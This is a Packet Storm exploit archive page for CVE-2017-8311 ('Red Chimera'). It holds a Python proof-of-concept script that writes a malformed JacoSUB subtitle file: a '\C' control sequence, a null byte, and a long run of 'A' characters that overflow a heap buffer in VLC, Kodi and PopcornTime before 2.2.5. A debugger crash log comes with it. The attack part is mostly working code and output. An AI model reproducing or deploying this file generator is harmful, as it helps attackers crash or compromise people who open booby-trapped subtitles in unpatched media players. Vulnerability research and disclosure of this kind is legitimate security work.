exploit the possibilities

VLC Media Player/Kodi/PopcornTime Memory Corruption

VLC Media Player/Kodi/PopcornTime Memory Corruption
Posted Apr 24, 2018
Authored by SivertPL

VLC Media Player/Kodi/PopcornTime versions prior to 2.2.5 Red Chimera memory corruption proof of concept exploit.

tags | exploit, proof of concept
advisories | CVE-2017-8311
MD5 | 76999fc96e50dee4590b7015afd5908e

VLC Media Player/Kodi/PopcornTime Memory Corruption

Change Mirror Download
"""
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
Author: SivertPL (kroppoloe@protonmail.ch)
CVE: CVE-2017-8311

Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
I want to join a research team.
"""

"""
ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
core demux error: option sub-original-fps does not exist
(33c.d10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
libsubtitle_plugin+0x44de:
715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
0:012:x86> g
(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64NotifyDebugger+0x1d:
00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
"""

import os
import struct
import sys
import argparse

len = 1025

def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
args = parser.parse_args()
if args.length:
global len
len = args.length
print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
write(args.filename, len)

def write(name, len):
subtitles = open("%s.jss" % name, "w+")
subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
subtitles.write("0:00:04.00 0:00:05.00 vm attack")
subtitles.write("\\C")
subtitles.write(struct.pack('B', 0))
subtitles.write('A' * len)
subtitles.close()
print "[+] Done!"

if __name__ == "__main__":
main(sys.argv[1:])


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close